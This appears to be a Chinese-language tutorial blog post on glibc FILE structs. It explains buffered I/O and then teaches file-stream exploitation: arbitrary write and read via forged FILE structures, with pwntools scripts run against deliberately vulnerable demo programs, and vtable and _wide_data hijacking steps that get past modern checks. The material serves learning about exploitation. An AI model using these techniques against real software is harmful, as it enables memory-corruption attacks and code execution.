File Struct

2025-04-07

1. 什么是File Descriptor
- 1.1 open,read,write
- 1.2 fopen,fread,fwrite
2. 什么是File Struct
3. file struct exploit
- 3.1 任意地址写
  - 3.1.1 理论
  - 3.1.2 实例
- 3.2 任意地址读
  - 3.1.1 理论
  - 3.1.2 实例
4. file struct in C++
- 4.1 什么是vtable
  - 4.2 vtable利用手法（曾经）
  - 4.3 vtable利用手法（现在）

1. 什么是File Descriptor

通常情况下,file descriptor指的是通过open函数打开一个文件后返回的内容:

int fd = open(“/home/wsxk/test.txt”, O_RDWR)
printf(“%d\n”, fd)

可以看出file descriptor实际上是一种整型数据，它是一个索引值
每个进程，在内核空间中都会维护一个process file table；file descriptor返回的值就代表的是process file table的索引，其中存放的值是指向Global File Table的指针; Global File Table存放的是文件在kernel中的描述结构。
而以这种形式进行文件操作，每次操作时均要陷入内核态，进行进程上下文切换；导致在进行read/write操作时，需要花费更大的开销
libc提供了另一套文件操作机制fopen,fread,fwrite，能够更快的处理这个文件操作，它是如何实现的呢？

1.1 open,read,write

给定一个例子：

#include <stdio.h>
#include <sys/fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int main(){
    char buf[0x1000];
    int fd = open("/dev/urandom",O_RDONLY);
    for(int i=0;i<50000;i++){
        read(fd,buf,0x20);
    }
    return 0;
}

strace ./read_loop 2>&1 | grep -E "^read" | wc -l
# strace ./readloop 跟踪read_loop运行的系统调用
# 2>&1 starce的输出在标准错误上，需要重定向到标准输出才能做后续的grep等操作
# | grep -E "^read" 使用扩展正则表达式，检索以read开头的行
# | wc -l 统计出现行数

1.2 fopen,fread,fwrite

#include <stdio.h>
#include <sys/fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int main(){
    char buf[0x1000];
    FILE * file = fopen("/dev/urandom","r");
    for(int i=0;i<50000;i++){
        fread(buf,1,0x20,file);
    }
    return 0;
}

高下立判。
可以看出，fread函数的使用明显降低了系统调用的次数，从而使速度大大提高。

2. 什么是File Struct

libc中的fread系列函数，使用了file struct，而不是file descriptor。file struct中包含了read/write使用的buffer指针，从而减少了上下文切换的次数，提高了I/O的性能
file struct的定义在https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/bits/types/struct_FILE.h#L49中
值得一提的是，file struct的结构及其buffer都位于用户态当中，这也是后续利用的基础条件之一

/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code.  */
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};

2.1 Reading from File to Memory

当从文件读取内容时，实际上是从buffer中读取内容的，如下图所示:
如果当前buffer的内容已经被读取完毕，_IO_read_ptr会重置成_IO_read_base，并调用系统调用从文件中重新读取内容填充到buffer中。
如果一个文件内容没有那么长，实际上如下图所示:

2.2 Writing from Memory to File

当把内容写入文件中时，实际上是写入到buffer中，如下图所示:
当buffer已被填充完毕后,_IO_write_prt会重置成_IO_write_base，并调用系统调用把buffer的内容写入到文件中。

2.3 File Struct详细分析

2.3.1 _flags

其定义在https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L62有注明

int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
//字面意思，高2字节代表file struct结构
#define _IO_MAGIC         0xFBAD0000 /* Magic number */ 
//低2字节就表示某些标识
#define _IO_UNBUFFERED        0x0002 //有这个标志就表示关闭buffer功能，本质上和open/read/write一样
#define _IO_NO_READS          0x0004 /* Reading not allowed.  */
#define _IO_NO_WRITES         0x0008 /* Writing not allowed.  */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING      0x1000

2.3.2 Buffer Pointers

无需多言

/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr;	/* Current read pointer */
char *_IO_read_end;	/* End of get area. */
char *_IO_read_base;	/* Start of putback+get area. */
char *_IO_write_base;	/* Start of put area. */
char *_IO_write_ptr;	/* Current put pointer. */
char *_IO_write_end;	/* End of put area. */
char *_IO_buf_base;	/* Start of reserve area. */
char *_IO_buf_end;	/* End of reserve area. */

2.3.3 _fileno

实际上就是这个文件的file descriptor

int _fileno;

3. file struct exploit

file struct的利用基于一个假设：攻击者能够控制file struct中的buffer pointer系列指针时，就能够获得任意地址读写的能力

3.1 任意地址写

如果我们能够控制file struct，我们可以修改它的某些结构成员，使其往我们想要写的地址中写入内容:

3.1.1 理论

Set flag value  -》 通常设置为0x0000
Set read_ptr = read_end  -》 通常设置为 read_ptr = read_end = 0x0
Set buf_base to address to write   -》 buf_base = memory
Set buf_end to address to write + length -》 buf_end = memory+length
buf_end - buf_base >= number of bytes to read -》 就是对length的限制，不用太在意

有人可能会问，为什么任意地址写，使用的是fread函数呢？
fread实际是从文件描述符中读入内容，放入到file struct的buffer中。
这里有一个本质原因我们修改file struct中的 _fileno变量为0x0（stdin）,这样fread实际会从stdin读入我们的输入，放入到缓冲区中
我们的输入准确放入到我们需要的缓冲区，需要read_ptr=read_end，这样在调用fread函数时会触发read_ptr,read_end重新设置。
这样实际调用fread函数时，实际发生了:

read_base,read_ptr 重设置为buf_base,read_end重设置为 buf_end
调用read函数从stdin中读取至少x长度（fread的 size*num决定），放入read_base当中
在从read_base中读取内容，放入到fread的buf参数当中

这样就完成了任意地址写，即我们的输入，写入到了作为缓冲区的某个地址当中

3.1.2 实例

#include <stdio.h>
#include <unistd.h>

int win_war = 0;

void win(){
    puts("you win");
}
int main(){
    char buf[256];

    printf("global win_war addr: %p\n",&win_war);
    FILE * file = fopen("./secret","r");
    read(0,file,0x100);
    puts("calling fread!");
    fread(buf,1,10,file);

    if(win_war){
        win();
    }
}

from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

p = process("./arbitrary_write")
p.recvuntil(b"addr: ")
win_var_addr = int(p.recvline().strip(b"\n"),16)
log.success(f"win_var_addr: {hex(win_var_addr)}")

# overwrite the file struct
fp =FileStructure()
payload = fp.read(win_var_addr,0x20)
print(payload)
print(fp)
p.send(payload)

p.recvuntil(b"fread")
p.send(b"a"*10)
p.interactive()

3.2 任意地址读

如果我们能够控制file struct，我们可以修改它的某些结构成员，使其往我们从我们想要的地址中读出内容:

3.1.1 理论

Set flag value  -》 通常为0x0800
Set write_base to memory to write -》 write_base = memory
Set write_ptr to address to write + length -》 write_ptr = memory+length
Set read_end = write_base -》 read_end = memory；这样设置是为了绕过某个校验

这里，我们会修改file struct中的_fileno为1，即标准输出stdout
此时fwrite函数实际上是将缓冲区的内容，输出到标准输出stdout中
因此，fwrite实际发生了:

识别到缓冲区已经满了（因为write_end为0），将write_base到write_ptr这个区域内的值，输出到标准输出stdout中
因为write_end为0，实际上就相当于没有缓冲区，所以write_ptr,write_base都会设为0
从fwrite的参数buf中的内容直接输出到stdout上

3.1.2 实例

#include <stdio.h>
#include <unistd.h>

char * secret_message = "flag{wsxkwsxk}";

int main(){
    printf("secret_message: %p\n",secret_message);

    FILE * file = fopen("/dev/null","w");
    read(0,file,0x100);

    char buf[256];
    puts("calling fwrite");
    fwrite(buf,1,0x10,file);

    return 0;
}

from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

p = process("./arbitrary_read")
p.recvuntil(b": ")
secret_value_leak = int(p.recvline().strip(b"\n"),16)
log.success(f"secret_value_leak: {hex(secret_value_leak)}")

# overwrite the file struct
fp =FileStructure()
payload = fp.write(secret_value_leak,0x10)
print(fp)
p.send(payload)
p.interactive()

4. file struct in C++

c++为了能够满足重载的特性，libc中的file struct也做了一定的拓展：

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

可以看到，说是拓展，其实指加了一个值:vtable

4.1 什么是vtable

vtable 是一个充满了函数指针的数字
它在c++ 二进制程序中经常被用到
它总是允许在运行时动态解析函数，重载的时候经常会用到

4.2 vtable利用手法（曾经）

通常，在执行fwrite函数的时候，其会调用file->vtable->_IO_new_file_xsputn（即vtable+0x38地址存放的函数指针），所以如果我们能够控制其值的话，通过能够完成利用
利用思路如下:

创建一个自己的vtable结构体， exploit_vtable

在exploit_vtable中填写合适的值，其他可以随意
1 exploit-vtable+0x38写为你想要调用的函数

覆盖file_struct
1 _IO_lock_t *_lock 必须是一个可写的区域且，其值必须为0
      _lock指针其实是多线程访问的一个锁，这个锁是为了防止race condition而生的，不能为空指针。_IO_lock_t * _lock为你设置好的值
2 vtable= exploit_vtable

执行fwrite函数

4.3 vtable利用手法（现在）

现代的libc库中新增了保护，使得曾经的方法不可用,具体的方式为vtable pointer的合法性校验
核心保护方式就是libc中有一个专门的区域（vtable area）用来存放vtable，如果vtable不是指向这个区域，则会报错
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libioP.h#L935
这里的利用思路是：vtable仍然指向vtable area，只不过其值被我们做了修改，最终vtable+0x38会指向IO_wfile_overflow函数，这个函数会在内部调用do_allocbuf函数，而该函数会随后使用file_struct->wide_data（也是一个file struct,里面也有vtable，且该vtable使用时没有校验）,最终调用file_struct->wide_data->_wide_vtable+0x68所存放的函数指针
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L121

struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;	/* Current read pointer */
  wchar_t *_IO_read_end;	/* End of get area. */
  wchar_t *_IO_read_base;	/* Start of putback+get area. */
  wchar_t *_IO_write_base;	/* Start of put area. */
  wchar_t *_IO_write_ptr;	/* Current put pointer. */
  wchar_t *_IO_write_end;	/* End of put area. */
  wchar_t *_IO_buf_base;	/* Start of reserve area. */
  wchar_t *_IO_buf_end;		/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;	/* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;	/* Pointer to first valid character of
				   backup area */
  wchar_t *_IO_save_end;	/* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

创建自己的结构体， exploit_vtable，exploit_vtable2, wide_data

在exploit_vtable中填写合适的值，其他可以随意
1 exploit_vtable+0x38写为你想要调用的函数,在这里的话，为IO_wfile_overflow。通常情况下直接在libc里找这个表即可。

在exploit_vtable2中填写合适的值，其他可以随意
1 exploit_vtable2+0x68为你想调用的函数

wide_data中填写合适的值，其他随意
1 wide_data+0xe0的值需要改为exploit_vtable2

覆盖file_struct, 
1 _IO_lock_t *_lock 必须是一个可写的区域且，其值必须为0
      _lock指针其实是多线程访问的一个锁，这个锁是为了防止race condition而生的，不能为空指针。_IO_lock_t * _lock为你设置好的值
2 _wide_data= wide_data
3 vtable= exploit_vtable

执行fwrite函数